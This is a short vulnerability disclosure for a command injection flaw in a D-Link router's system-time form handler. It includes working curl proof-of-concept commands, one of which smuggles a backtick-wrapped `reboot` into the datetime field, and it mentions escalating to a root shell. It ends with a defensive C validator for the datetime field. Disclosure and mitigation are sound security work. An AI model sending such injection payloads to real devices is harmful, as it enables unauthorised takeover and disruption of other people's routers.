- Manufacturer's address: https://www.dlink.com/
- Firmware download address: http://tsd.dlink.com.tw/GPL.asp
The picture above shows the latest firmware for this version
The command injection vulnerability is in /goform/form2systime.cgi. The only condition for triggering it is that the datetime parameter carries the `-:` sequence.
First, get the tokenid:
curl http://192.168.0.1/dir_login.asp | grep tokenid
Next, run the following PoC; you can see that the router restarts:
curl -i -X POST http://192.168.0.1/goform/form2systime.cgi -d tokenid=xxxxx -d 'datetime=`reboot`-:'

Finally, an exploit can be written to obtain a root shell.
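A mitigation for this class of bug, shown as an added example that is not D-Link's code and not part of the original advisory: parse the datetime field against one fixed format and reject everything else, so the value never reaches a shell. The function names and the `YYYY-MM-DD HH:MM:SS` format are assumptions; the page does not state the format the handler expects.

```c
#include <ctype.h>
#include <string.h>
#include <time.h>

/* Parse exactly n decimal digits starting at s; -1 on any non-digit. */
static int fixed_digits(const char *s, int n, int *out)
{
    int v = 0;
    for (int i = 0; i < n; i++) {
        if (!isdigit((unsigned char)s[i]))
            return -1;
        v = v * 10 + (s[i] - '0');
    }
    *out = v;
    return 0;
}

/*
 * Hypothetical validator for the datetime form field.
 * Assumed format (not given on the page): "YYYY-MM-DD HH:MM:SS".
 * Returns 0 and fills *out on success, -1 on any deviation, so
 * backticks, $(), ';', '|' and other shell metacharacters are rejected.
 */
int parse_datetime_strict(const char *s, struct tm *out)
{
    static const int mdays[12] = {31,28,31,30,31,30,31,31,30,31,30,31};
    int y, mo, d, h, mi, sec, dim;

    /* Length is checked first, so the fixed offsets below are in bounds. */
    if (s == NULL || out == NULL || strlen(s) != 19)
        return -1;
    if (s[4] != '-' || s[7] != '-' || s[10] != ' ' ||
        s[13] != ':' || s[16] != ':')
        return -1;
    if (fixed_digits(s, 4, &y) || fixed_digits(s + 5, 2, &mo) ||
        fixed_digits(s + 8, 2, &d) || fixed_digits(s + 11, 2, &h) ||
        fixed_digits(s + 14, 2, &mi) || fixed_digits(s + 17, 2, &sec))
        return -1;
    if (y < 1970 || mo < 1 || mo > 12 || h > 23 || mi > 59 || sec > 59)
        return -1;
    dim = mdays[mo - 1];
    if (mo == 2 && y % 4 == 0 && (y % 100 != 0 || y % 400 == 0))
        dim = 29;                       /* leap-year February */
    if (d < 1 || d > dim)
        return -1;
    memset(out, 0, sizeof *out);
    out->tm_year = y - 1900; out->tm_mon = mo - 1; out->tm_mday = d;
    out->tm_hour = h; out->tm_min = mi; out->tm_sec = sec;
    out->tm_isdst = -1;
    return 0;
}
```

The resulting `struct tm` can be passed to `mktime()` and `clock_settime()` directly, which removes the need to build a command string from request data.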

